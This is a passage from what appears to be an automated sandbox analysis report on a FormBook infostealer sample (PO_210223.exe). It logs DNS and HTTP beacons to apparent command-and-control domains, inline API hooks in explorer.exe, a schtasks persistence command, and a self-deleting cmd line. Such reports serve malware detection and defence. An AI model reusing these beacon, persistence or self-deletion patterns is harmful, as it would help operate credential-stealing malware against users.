                                                    Feb 23, 2021 09:00:26.240051985 CET  80           49767      23.229.197.103  192.168.2.4
                                                    Feb 23, 2021 09:00:26.258440971 CET  80           49767      23.229.197.103  192.168.2.4
                                                    Feb 23, 2021 09:00:26.258481979 CET  80           49767      23.229.197.103  192.168.2.4
                                                    Feb 23, 2021 09:00:26.258781910 CET  49767        80         192.168.2.4     23.229.197.103
                                                    Feb 23, 2021 09:00:26.258807898 CET  49767        80         192.168.2.4     23.229.197.103
                                                    Feb 23, 2021 09:00:26.447956085 CET  80           49767      23.229.197.103  192.168.2.4

                                                    UDP Packets

                                                    Timestamp                          Source Port  Dest Port  Source IP    Dest IP
                                                    Feb 23, 2021 08:58:18.862360001 CET  53723        53         192.168.2.4  8.8.8.8
                                                    Feb 23, 2021 08:58:18.898766994 CET  64646        53         192.168.2.4  8.8.8.8
                                                    Feb 23, 2021 08:58:18.911287069 CET  53           53723      8.8.8.8      192.168.2.4
                                                    Feb 23, 2021 08:58:18.947359085 CET  53           64646      8.8.8.8      192.168.2.4
                                                    Feb 23, 2021 08:58:19.170614958 CET  65298        53         192.168.2.4  8.8.8.8
                                                    Feb 23, 2021 08:58:19.219403028 CET  53           65298      8.8.8.8      192.168.2.4
                                                    Feb 23, 2021 08:58:20.837881088 CET  59123        53         192.168.2.4  8.8.8.8
                                                    Feb 23, 2021 08:58:20.886643887 CET  53           59123      8.8.8.8      192.168.2.4
                                                    Feb 23, 2021 08:58:21.803251982 CET  54531        53         192.168.2.4  8.8.8.8
                                                    Feb 23, 2021 08:58:21.854785919 CET  53           54531      8.8.8.8      192.168.2.4
                                                    Feb 23, 2021 08:58:22.494116068 CET  49714        53         192.168.2.4  8.8.8.8
                                                    Feb 23, 2021 08:58:22.552618027 CET  53           49714      8.8.8.8      192.168.2.4
                                                    Feb 23, 2021 08:58:22.623030901 CET  58028        53         192.168.2.4  8.8.8.8
                                                    Feb 23, 2021 08:58:22.671576977 CET  53           58028      8.8.8.8      192.168.2.4
                                                    Feb 23, 2021 08:58:23.635773897 CET  53097        53         192.168.2.4  8.8.8.8
                                                    Feb 23, 2021 08:58:23.687556028 CET  53           53097      8.8.8.8      192.168.2.4
                                                    Feb 23, 2021 08:58:24.639569044 CET  49257        53         192.168.2.4  8.8.8.8
                                                    Feb 23, 2021 08:58:24.688286066 CET  53           49257      8.8.8.8      192.168.2.4
                                                    Feb 23, 2021 08:58:48.091200113 CET  62389        53         192.168.2.4  8.8.8.8
                                                    Feb 23, 2021 08:58:48.142822027 CET  53           62389      8.8.8.8      192.168.2.4
                                                    Feb 23, 2021 08:58:49.042687893 CET  49910        53         192.168.2.4  8.8.8.8
                                                    Feb 23, 2021 08:58:49.099924088 CET  53           49910      8.8.8.8      192.168.2.4
                                                    Feb 23, 2021 08:58:49.917707920 CET  55854        53         192.168.2.4  8.8.8.8
                                                    Feb 23, 2021 08:58:49.969238997 CET  53           55854      8.8.8.8      192.168.2.4
                                                    Feb 23, 2021 08:58:51.016117096 CET  64549        53         192.168.2.4  8.8.8.8
                                                    Feb 23, 2021 08:58:51.067745924 CET  53           64549      8.8.8.8      192.168.2.4
                                                    Feb 23, 2021 08:58:51.809954882 CET  63153        53         192.168.2.4  8.8.8.8
                                                    Feb 23, 2021 08:58:51.858937025 CET  53           63153      8.8.8.8      192.168.2.4
                                                    Feb 23, 2021 08:58:52.633148909 CET  52991        53         192.168.2.4  8.8.8.8
                                                    Feb 23, 2021 08:58:52.682436943 CET  53           52991      8.8.8.8      192.168.2.4
                                                    Feb 23, 2021 08:58:53.913933992 CET  53700        53         192.168.2.4  8.8.8.8
                                                    Feb 23, 2021 08:58:53.965698004 CET  53           53700      8.8.8.8      192.168.2.4
                                                    Feb 23, 2021 08:58:54.282479048 CET  51726        53         192.168.2.4  8.8.8.8
                                                    Feb 23, 2021 08:58:54.334002972 CET  53           51726      8.8.8.8      192.168.2.4
                                                    Feb 23, 2021 08:58:54.747322083 CET  56794        53         192.168.2.4  8.8.8.8
                                                    Feb 23, 2021 08:58:54.795957088 CET  53           56794      8.8.8.8      192.168.2.4
                                                    Feb 23, 2021 08:58:55.957005024 CET  56534        53         192.168.2.4  8.8.8.8
                                                    Feb 23, 2021 08:58:56.026484013 CET  53           56534      8.8.8.8      192.168.2.4
                                                    Feb 23, 2021 08:58:57.354686975 CET  56627        53         192.168.2.4  8.8.8.8
                                                    Feb 23, 2021 08:58:57.406266928 CET  53           56627      8.8.8.8      192.168.2.4
                                                    Feb 23, 2021 08:58:59.442359924 CET  56621        53         192.168.2.4  8.8.8.8
                                                    Feb 23, 2021 08:58:59.491060972 CET  53           56621      8.8.8.8      192.168.2.4
                                                    Feb 23, 2021 08:59:00.320329905 CET  63116        53         192.168.2.4  8.8.8.8
                                                    Feb 23, 2021 08:59:00.377401114 CET  53           63116      8.8.8.8      192.168.2.4
                                                    Feb 23, 2021 08:59:09.531554937 CET  64078        53         192.168.2.4  8.8.8.8
                                                    Feb 23, 2021 08:59:09.596590042 CET  53           64078      8.8.8.8      192.168.2.4
                                                    Feb 23, 2021 08:59:15.546408892 CET  64801        53         192.168.2.4  8.8.8.8
                                                    Feb 23, 2021 08:59:15.595046043 CET  53           64801      8.8.8.8      192.168.2.4
                                                    Feb 23, 2021 08:59:23.286400080 CET  61721        53         192.168.2.4  8.8.8.8
                                                    Feb 23, 2021 08:59:23.353519917 CET  53           61721      8.8.8.8      192.168.2.4
                                                    Feb 23, 2021 08:59:24.241563082 CET  51255        53         192.168.2.4  8.8.8.8
                                                    Feb 23, 2021 08:59:24.301482916 CET  53           51255      8.8.8.8      192.168.2.4
                                                    Feb 23, 2021 08:59:25.089857101 CET  61522        53         192.168.2.4  8.8.8.8
                                                    Feb 23, 2021 08:59:25.173163891 CET  53           61522      8.8.8.8      192.168.2.4
                                                    Feb 23, 2021 08:59:25.749360085 CET  52337        53         192.168.2.4  8.8.8.8
                                                    Feb 23, 2021 08:59:25.809186935 CET  53           52337      8.8.8.8      192.168.2.4
                                                    Feb 23, 2021 08:59:26.346574068 CET5504653192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:59:26.403739929 CET53550468.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:59:27.002182961 CET4961253192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:59:27.021836042 CET4928553192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:59:27.059883118 CET53496128.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:59:27.086724043 CET53492858.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:59:27.706384897 CET5060153192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:59:27.763459921 CET53506018.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:59:28.665956974 CET6087553192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:59:28.736999035 CET53608758.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:59:29.677529097 CET5644853192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:59:29.734661102 CET53564488.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:59:30.280334949 CET5917253192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:59:30.337259054 CET53591728.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:59:35.141000032 CET6242053192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:59:35.201513052 CET53624208.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:59:45.485291004 CET6057953192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:59:45.687182903 CET53605798.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:00:03.621087074 CET5018353192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:00:03.671164989 CET53501838.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:00:04.547594070 CET6153153192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:00:04.906436920 CET53615318.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:00:05.773307085 CET4922853192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:00:05.838593006 CET53492288.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:00:25.798266888 CET5979453192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:00:25.860059977 CET53597948.8.8.8192.168.2.4

                                                    DNS Queries

                                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                    Feb 23, 2021 08:59:45.485291004 CET | 192.168.2.4 | 8.8.8.8 | 0x34c5 | Standard query (0) | www.pophazard.com | A (IP address) | IN (0x0001)
                                                    Feb 23, 2021 09:00:04.547594070 CET | 192.168.2.4 | 8.8.8.8 | 0xb733 | Standard query (0) | www.246835.com | A (IP address) | IN (0x0001)
                                                    Feb 23, 2021 09:00:25.798266888 CET | 192.168.2.4 | 8.8.8.8 | 0x8902 | Standard query (0) | www.kaieteurny.com | A (IP address) | IN (0x0001)

                                                    DNS Answers

                                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                    Feb 23, 2021 08:59:45.687182903 CET | 8.8.8.8 | 192.168.2.4 | 0x34c5 | No error (0) | www.pophazard.com | - | 204.11.56.48 | A (IP address) | IN (0x0001)
                                                    Feb 23, 2021 09:00:04.906436920 CET | 8.8.8.8 | 192.168.2.4 | 0xb733 | No error (0) | www.246835.com | sll.nnu.pw | - | CNAME (Canonical name) | IN (0x0001)
                                                    Feb 23, 2021 09:00:04.906436920 CET | 8.8.8.8 | 192.168.2.4 | 0xb733 | No error (0) | sll.nnu.pw | - | 103.66.59.142 | A (IP address) | IN (0x0001)
                                                    Feb 23, 2021 09:00:25.860059977 CET | 8.8.8.8 | 192.168.2.4 | 0x8902 | No error (0) | www.kaieteurny.com | kaieteurny.com | - | CNAME (Canonical name) | IN (0x0001)
                                                    Feb 23, 2021 09:00:25.860059977 CET | 8.8.8.8 | 192.168.2.4 | 0x8902 | No error (0) | kaieteurny.com | - | 23.229.197.103 | A (IP address) | IN (0x0001)

                                                    HTTP Request Dependency Graph

                                                    • www.pophazard.com
                                                    • www.246835.com
                                                    • www.kaieteurny.com

                                                    HTTP Packets

                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    0 | 192.168.2.4 | 49763 | 204.11.56.48 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Feb 23, 2021 08:59:45.858961105 CET | 6811 | OUT | GET /ntg/?ojoHzZ=ezEzfTUVqdhTeHhhSUO1nROjhCSdyq2ILgetv621tco9QxJ0Ek6h+l0QSU1+LT7ErdbR&1bm=GPD0lNKPfFHTAb HTTP/1.1
                                                    Host: www.pophazard.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Feb 23, 2021 08:59:46.287998915 CET | 6813 | IN | HTTP/1.1 200 OK
                                                    Date: Tue, 23 Feb 2021 07:59:45 GMT
                                                    Server: Apache
                                                    Set-Cookie: vsid=918vr3616127860534399; expires=Sun, 22-Feb-2026 07:59:46 GMT; Max-Age=157680000; path=/; domain=www.pophazard.com; HttpOnly
                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_F6FX+ZNnJXLKTmtoz4Zbn33M3dcgDySmD+TZLM31TPXG44ciXETJu/O4ZJisipBqiF85zsahUw0ArWA/pDFCdw==
                                                    Keep-Alive: timeout=5, max=112
                                                    Connection: Keep-Alive
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=UTF-8
                                                    Data Ascii: 5b93<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.pophazard.com/px.js?ch=1"></script><script type="text/javascript" src="http://www.pophazard.com/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";imglog.style.width="0px";imglog.src="http://www.pophazard.com/sk-logabpstatus.php?a=aG42QXdLZEpxVDR5Y2RqNUtBbnIvaUNNaWJVdEVQVjlJMUxVR2dwWFFESHdKV2VlaDF3Tjh0VktnZEpMdkRlK25Ga0RBNHFrL1daaUpIMTVZOU1PS0dnME1XWll6WkVkRVUxT29XbHRVSlU9&b="+abp;document.body.appendChild(imglog);if(typeof abperu


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    1 | 192.168.2.4 | 49765 | 103.66.59.142 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Feb 23, 2021 09:00:05.239259958 CET | 6841 | OUT | GET /ntg/?ojoHzZ=w4X+hAUHJfroJmp94c1onPOAPenZZpTxtRzXhSWsn9e2URXOAMjiMifVYC4X6954J+Dz&1bm=GPD0lNKPfFHTAb HTTP/1.1
                                                    Host: www.246835.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Feb 23, 2021 09:00:05.594891071 CET | 6841 | IN | HTTP/1.1 302 Found
                                                    Cache-Control: private
                                                    Content-Type: text/html; charset=utf-8
                                                    Location: https://www.246835.com/ntg/?ojohzz=w4x+hauhjfrojmp94c1onpoapenzzptxtrzxhswsn9e2urxoamjimifvyc4x6954j+dz&1bm=gpd0lnkpffhtab
                                                    Server: Microsoft-IIS/10.0
                                                    X-AspNet-Version: 4.0.30319
                                                    X-Powered-By: ASP.NET
                                                    Date: Tue, 23 Feb 2021 08:00:05 GMT
                                                    Connection: close
                                                    Content-Length: 243
                                                    Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.246835.com/ntg/?ojohzz=w4x+hauhjfrojmp94c1onpoapenzzptxtrzxhswsn


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    2 | 192.168.2.4 | 49767 | 23.229.197.103 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Feb 23, 2021 09:00:26.050930977 CET | 6853 | OUT | GET /ntg/?ojoHzZ=bxqEOtZwpu8QOdqfa5M05y7zdw+lGZ3K+8kzjODwarG6Nc6O9nhCMo5PAGRXJYSnY3HU&1bm=GPD0lNKPfFHTAb HTTP/1.1
                                                    Host: www.kaieteurny.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Feb 23, 2021 09:00:26.258440971 CET | 6854 | IN | HTTP/1.1 500 Internal Server Error
                                                    Date: Tue, 23 Feb 2021 08:00:26 GMT
                                                    Server: Apache
                                                    Content-Length: 676
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@kaieteurny.cliques.com to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><p>Additionally, a 500 Internal Server Errorerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Code Manipulations

                                                    User Modules

                                                    Hook Summary

                                                    Function Name | Hook Type | Active in Processes
                                                    PeekMessageA | INLINE | explorer.exe
                                                    PeekMessageW | INLINE | explorer.exe
                                                    GetMessageW | INLINE | explorer.exe
                                                    GetMessageA | INLINE | explorer.exe

                                                    Processes

                                                    Process: explorer.exe, Module: user32.dll
                                                    Function Name | Hook Type | New Data
                                                    PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x84 0x4E 0xE6
                                                    PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8C 0xCE 0xE6
                                                    GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8C 0xCE 0xE6
                                                    GetMessageA | INLINE | 0x48 0x8B 0xB8 0x84 0x4E 0xE6

                                                    Statistics

                                                    Behavior

                                                    System Behavior

                                                    General

                                                    Start time:08:58:25
                                                    Start date:23/02/2021
                                                    Path:C:\Users\user\Desktop\PO_210223.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Users\user\Desktop\PO_210223.exe'
                                                    Imagebase:0x890000
                                                    File size:802304 bytes
                                                    MD5 hash:E40AF9745E938B72D5D860BBC679AEBF
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.681205179.0000000004429000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.681205179.0000000004429000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.681205179.0000000004429000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low

                                                    General

                                                    Start time:08:58:39
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kwqifureL' /XML 'C:\Users\user\AppData\Local\Temp\tmp33D2.tmp'
                                                    Imagebase:0xb80000
                                                    File size:185856 bytes
                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:08:58:39
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff724c50000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:08:58:40
                                                    Start date:23/02/2021
                                                    Path:C:\Users\user\Desktop\PO_210223.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\Desktop\PO_210223.exe
                                                    Imagebase:0xc30000
                                                    File size:802304 bytes
                                                    MD5 hash:E40AF9745E938B72D5D860BBC679AEBF
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.715862611.00000000016B0000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.715862611.00000000016B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.715862611.00000000016B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low

                                                    General

                                                    Start time:08:58:42
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:
                                                    Imagebase:0x7ff6fee60000
                                                    File size:3933184 bytes
                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:08:58:56
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\SysWOW64\ipconfig.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\ipconfig.exe
                                                    Imagebase:0xe50000
                                                    File size:29184 bytes
                                                    MD5 hash:B0C7423D02A007461C850CD0DFE09318
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.907602619.0000000000D90000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.907602619.0000000000D90000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.907602619.0000000000D90000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.907432455.0000000000C60000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.907432455.0000000000C60000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.907432455.0000000000C60000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:moderate

                                                    General

                                                    Start time:08:59:00
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:/c del 'C:\Users\user\Desktop\PO_210223.exe'
                                                    Imagebase:0x11d0000
                                                    File size:232960 bytes
                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:08:59:01
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff724c50000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
